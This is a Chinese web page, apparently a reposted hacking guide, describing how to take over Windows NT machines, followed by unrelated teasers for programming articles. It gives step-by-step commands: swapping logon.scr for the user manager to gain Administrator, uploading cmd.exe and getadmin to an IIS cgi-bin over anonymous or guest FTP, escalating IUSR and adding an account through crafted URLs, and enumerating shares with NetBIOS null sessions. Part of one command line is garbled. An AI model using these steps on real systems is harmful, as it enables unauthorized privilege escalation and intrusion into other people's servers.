经过测试,看来Administrastor,账户真的不安全

如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:

先把c:\winnt\system32下的logon.scr改名为logon.old备份

然后把usrmgr.exe改名为logon.scr

然后重新启动

logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而是用户管理器

这时他就有权限把自己加到Administrator组

不要忘记把文件名改回来啊!

之二:

下面的技术适用于不重视NT网络安全的网站,

一些 http的技术也可以供较高级的人员参考

进入NT网络可以采取下面的步骤:

因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的,有些anonymous的帐号还有upload权限,我们就要攻击这类站点。因为如果不允许匿名帐号,就可能造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。

正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):

ftp www.xxx.com

Connected to www.xxx.com

ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSER_ntsvr2的用户帐号,属于Domain user组,这个帐号我们以后要用来获取Administrator的权限

User (www.xxx.comnone)):anonymous

Password: 输入 guest@ 或者guest

对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain guest组

在这种情况下我们就可以进NT server的ftp了。

进去以后,看看目录列表,试试 cd /c 或wwwroot等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。

现在,开始查找cgi-bin目录(或者scripts目录),进去以后,

把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin

然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN

大约十多秒后屏幕显示:

CGI Error

这时有90%的可能是:你已经把IUSER_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员

下面可以add user:

http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add

这样就创建了一个叫china用户,密码是news,然后:

http://www.xxx.com/cgi-bin/getadmin.exe?china

或者

http://www.xxx.com/scripts/tools/getadmin.exe?china

你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录

之三:

用NT的Netbios技术扫描

nbtstat -a http://www.xxx.com/

或者

nbtstat -A http://www.xxx.com/

这样可以得到其域的共享资源名称

net view file://www.xxx.com/

可以获得其机器的共享资源名称,如果有c盘

net use f: file://www.xxx.com/c

可以用f:映射其c盘

net use $">\\111.111.111.111\ipc$Content$nbsp;"quot;"quot; /user:"quot;"quot;

之四: Unix下移植过来的工具:

Windows95"amp;98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包:

WinDump95.exe 使用前还要下载这个库 Packet95.exe

WindowsNT用户的版本

WinDump.exe PacketNT.exe

(0)

相关推荐

  • 经过测试,看来Administrastor,账户真的不安全

    如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号: 先把c:\winnt\system32下的logon.scr改名为logon.old备份 然后把usrmgr.exe改名为logon.scr 然后重新启动 logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而是用户管理器 这时他就有权限把自己加到Administrator组 不要忘记把文件名改回来啊! 之二: 下面的技术适用于不重视NT网络安全的网站, 一些 http的技术也可以

  • C#默认以管理员身份运行程序实现代码

    上篇博客写了一下如何通过网络时间更新系统时间,当时写的时候怎么测试都不成功,后来想想是不是我操作系统(当时是在win8上开发的)的问题.当时我猜应该是权限不够,导致无法修改系统时间,于是我以管理员身份运行了一次,结果测试成功!原来真的是权限的问题,于是就在程序里面加入了默认以管理员身份运行的代码.下面让我们看看是怎么实现的吧! 程序默认以管理员身份运行 复制代码 代码如下: static void Main(string[] Args) { /** * 当前用户是管理员的时候,直接启动应用程序

  • Ubuntu中搭建Nginx、PHP环境最简单的方法

    前言:百度出来的结果好坑爹,而且某些文章说别人坑爹,可他自己也坑爹.求业界良心啊.还是谷歌靠谱. 系统环境:Ubuntu 13 和 Linux Mint 15都通过. 默认安装的是nginx 1.2.5,php5.4.9 先安装: 复制代码 代码如下: sudo apt-get install nginx php5-fpm 我是在新安装的Ubuntu13上测试通过的,真的只安装这两个东西就够了. 然后编辑配置文件. 复制代码 代码如下: sudo gedit /etc/nginx/site-av

  • 由Python运算π的值深入Python中科学计算的实现

    π是一个无数人追随的真正的神奇数字.我不是很清楚一个永远重复的无理数的迷人之处.在我看来,我乐于计算π,也就是计算π的值.因为π是一个无理数,它是无限的.这就意味着任何对π的计算都仅仅是个近似值.如果你计算100位,我可以计算101位并且更精确.迄今为止,有些人已经选拔出超级计算机来试图计算最精确的π.一些极值包括 计算π的5亿位.你甚至能从网上找到包含 π的一百亿位的文本文件(注意啦!下载这个文件可能得花一会儿时间,并且没法用你平时使用的记事本应用程序打开.).对于我而言,如何用几行简单的Py

  • JavaScript代码编写中各种各样的坑和填坑方法

    坑"这个字,在此的意思是"陷阱".由于 JavaScript "弱语言"的性质,使得其在使用过程中异常的宽松灵活,但也极为容易"中招".这些坑往往隐藏着,所以必须擦亮双眼,才能在学习与应用 JS 的道路上走的一帆风顺. 一.全局变量 JavaScript 通过函数管理作用域.在函数内部声明的变量只在这个函数内部,函数外面不可用.另一方面,全局变量就是在任何函数外面声明的或是未声明直接简单使用的. "未声明直接简单使用"

  • 试用Kesion CMS 4.0商城版 商业版

    今天拿到了Kesion CMS 4.0商城版 升级出现了,问题,因为原来改动的文件较多,真不敢轻易升级,太痛苦了啊,数据库表结构改了不少,我自己写的代码都直接读的数据库,不知道还能用不,星期六我就正式,升级,测试了,后台真的不错,速度也提高了不少,以后可以拿来做站了,后台看着就舒服. 网上有好多朋友问我要,不好意思啊.支持kesion他们,开发那么好的系统

  • 探讨GDFONTPATH能否被winxp下的php支持

    php学习中遇一问题,使用GD库绘图,设置字体路径变量:putenv('GDFONTPATH=c:\windows\Fonts');$fontname='arial';$bbox=imagettfbbox($font_size,0,$fontname,$button_text); 提示:找不到字体文件,但是Fonts文件夹下明明有,是不是GDFONTPATH环境变量不被windows支持?这个问题网上很多人都有遇到,很不幸,我也碰到了,我的测试结果是,真的不能在windows里面支持.怎么办呢?

  • 快速解决angularJS中用post方法时后台拿不到值的问题

    用angularJS中的$http服务碰到了一个问题:运用$http.post方法向后台传递数据时,后台的php页面获取不到data参数传过来的值. 不论是这种姿势: $http.post( "1.php", { id: 1 }).success(function (data) { console.log(data); }); 还是这种姿势: $http({ method: 'POST', url: '1.php', data: { id: 1 } }).success(functio

  • Java集合定义与用法实例总结【Set、List与Map】

    本文实例讲述了Java集合定义与用法.分享给大家供大家参考,具体如下: java集合大体可分为三类,分别是Set.List和Map,它们都继承了基类接口Collection,Collection接口定义了众多操作集合的基本方法,如下: 为了访问Collection集合,不得不去了解Iterator接口.该接口很简单,主要用于定义访问集合的方法,如下: 所以上述的三大类子集合必定都继承了上面2个接口.其中Set集合要求元素不重复,且内部无序,所以访问时只能根据元素值来访问:List内部为动态数组,

  • HTTP请求返回415错误码定位解决方法

    今天在工作中,发现我再调用外部API接口的时候,发现一个奇怪的问题,就是我Eclipse中写代码调用外部API接口时返回HTTP状态码是415,但是我将相同的报文放在HttpRequester里面请求的时候却又可以拿到正常返回结果,而不是415错误. 不知道有没有人跟我一样遇到过这个问题,这里记录一下解决办法. 首先我们还是看下HTTP的状态码关于415返回码的说明吧. 415 Unsupported Media Type 服务器无法处理请求附带的媒体格式 乍看之下,当时并没有看出来是什么意思,

随机推荐